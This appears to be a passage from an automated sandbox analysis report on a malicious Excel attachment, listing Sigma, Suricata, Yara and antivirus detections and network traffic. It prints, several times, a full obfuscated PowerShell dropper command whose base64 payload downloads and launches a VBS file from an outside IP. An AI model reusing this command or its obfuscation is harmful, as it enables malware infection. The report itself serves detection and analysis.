          Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.67.216.244, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3188, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3632, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IEnetbookupdation[1].vbs
          Sigma detected: Suspicious Office Outbound Connections
          Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3188, Protocol: tcp, SourceIp: 172.67.216.244, SourceIsIpv6: false, SourcePort: 443
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" , ProcessId: 3852, ProcessName: wscript.exe
          Sigma detected: Dynamic CSharp Compile Artefact
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3632, TargetFilename: C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline
          Sigma detected: Modification of IE Registry Settings
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3188, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))", CommandLine: pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1O
          Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3632, TargetFilename: C:\Users\user\AppData\Local\Temp\s4hj22iq.ipe.ps1

          Data Obfuscation

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline", ProcessId: 3752, ProcessName: csc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-30T10:26:17.393742+020020241971A Network Trojan was detected104.168.7.780192.168.2.2249166TCP
          2024-09-30T10:26:20.099163+020020241971A Network Trojan was detected104.168.7.780192.168.2.2249168TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-30T10:26:17.393729+020020244491Attempted User Privilege Gain192.168.2.2249166104.168.7.780TCP
          2024-09-30T10:26:20.094232+020020244491Attempted User Privilege Gain192.168.2.2249168104.168.7.780TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeAvira: detection malicious, Label: HEUR/AGEN.1332117
          Multi AV Scanner detection for submitted file
          Source: PI#0034250924.xla.xlsxReversingLabs: Detection: 18%
          Source: PI#0034250924.xla.xlsxVirustotal: Detection: 23%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: PI#0034250924.xla.xlsxJoe Sandbox ML: detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49167 version: TLS 1.2
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdbhP\ source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdb source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
          Source: global trafficDNS query: name: og1.in
          Source: global trafficDNS query: name: og1.in
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
